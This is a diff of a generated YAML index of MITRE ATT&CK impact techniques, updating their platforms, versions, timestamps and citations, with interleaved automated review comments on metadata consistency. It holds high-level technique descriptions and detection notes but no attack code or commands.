- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
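Review bot: two things in this hunk deserve a mention in the commit message. First, the FireEye APT38 reference URL changes from `https://content.fireeye.com/apt/rpt-apt38` to a `mandiant.com` PDF, which is a source change and not just a reorder. Second, the unprefixed lines `, which will make Exchange content inaccessible` sitting between the `-` and `+` `such as MSExchangeIS` lines suggest the rendered diff lost some markup inside the description string; the real change there is only that `(Citation: Novetta Blockbuster)` moves after the full stop. Also note T1561 is left at `x_mitre_attack_spec_version: 3.1.0` in the context lines while the regenerated entries carry `3.2.0`.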
@@ -57505,10 +58260,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -57519,39 +58278,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
@@ -57569,13 +58326,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
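Review bot: the platform list for T1499.004 shrinks to Windows, IaaS, Linux and macOS (Azure AD, Office 365, SaaS and Google Workspace are gone from the removed block above) with only a minor version bump from 1.2 to 1.3, and the same narrowing is applied to T1498.002, T1499.002 and T1499 further down. If this tracks the upstream ATT&CK release it is fine, but any per-platform index that currently lists these techniques under the removed platforms needs regenerating in the same change, otherwise the CSV indexes and this YAML will disagree.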
@@ -57583,36 +58347,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
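Review bot: the `external_references` entries for T1499.004 are re-emitted with `url` ahead of `external_id` and `description` ahead of `url`, so this hunk is again ordering churn plus the `revoked: false` addition; the deleted T1565.003 lines reappear in the next hunk. The doubled period in `Cid, D..` is carried over from the upstream citation text and should stay as-is, since a hand fix in a generated file would be reverted by the next refresh.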
@@ -57621,11 +58376,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57634,17 +58395,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
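Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 with nothing replacing it; if any tooling in this repo filters techniques on that field it will now silently see it as absent, so that is worth confirming before merge. The FireEye APT38 reference also moves from content.fireeye.com to a mandiant.com PDF while its `description` and retrieval date stay unchanged; please check the new URL actually resolves.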
@@ -57653,6 +58428,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57668,17 +58444,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
@@ -57688,14 +58459,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -57704,28 +58476,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57736,7 +58508,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57747,17 +58518,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57794,7 +58560,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -57815,7 +58582,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
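Review bot: the `modified` timestamp for T1491 goes backwards, from 2022-05-11 to 2022-03-25, while almost every other technique in this diff moves forward to October 2024. A regression like this usually means the generator is now reading a different field or an older copy of the object, not that the technique was edited; the same backwards move happens for T1491.001 and T1486 below, and those two also keep `x_mitre_attack_spec_version: 2.1.0` rather than 3.2.0. Worth checking which source these three objects are being pulled from.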
@@ -57842,12 +58609,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
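Review bot: T1491 loses `x_mitre_attack_spec_version: 2.1.0` here and, unlike the other techniques in this diff, no replacement `x_mitre_attack_spec_version: 3.2.0` line appears for it in this hunk; since the lines between hunks are unchanged, T1491 appears to end up without the field entirely, so please confirm that is intended. The new T1496.002 (Bandwidth Hijacking) entry is otherwise consistent with the other added sub-techniques (`x_mitre_deprecated: false`, `revoked: false`, `atomic_tests: []`); its empty `x_mitre_detection` comes from upstream, and the listed data sources (network flow, content and connection creation, process creation, command execution) are what any detection guidance for it would be built on.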
@@ -57880,7 +58713,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -57890,10 +58723,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
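Review bot: for T1657 the platforms `Office 365` and `Google Workspace` are replaced by the single `Office Suite` entry with a bump from 1.1 to 1.2. Any per-platform index derived from `x_mitre_platforms` will stop listing T1657 under the old names, so an office-suite index should be generated alongside this change or the consumer mapping updated; the same rename appears for T1531 below.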
@@ -57956,7 +58788,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -57997,7 +58828,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
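Review bot: the `modified` timestamp for T1491.001 regresses from 2022-11-08 to 2022-07-28, and the `x_mitre_attack_spec_version: 2.1.0` context line in the next hunk shows this object was not refreshed to 3.2.0 like its siblings; check which copy of the object the generator picked up for it.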
@@ -58018,9 +58849,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
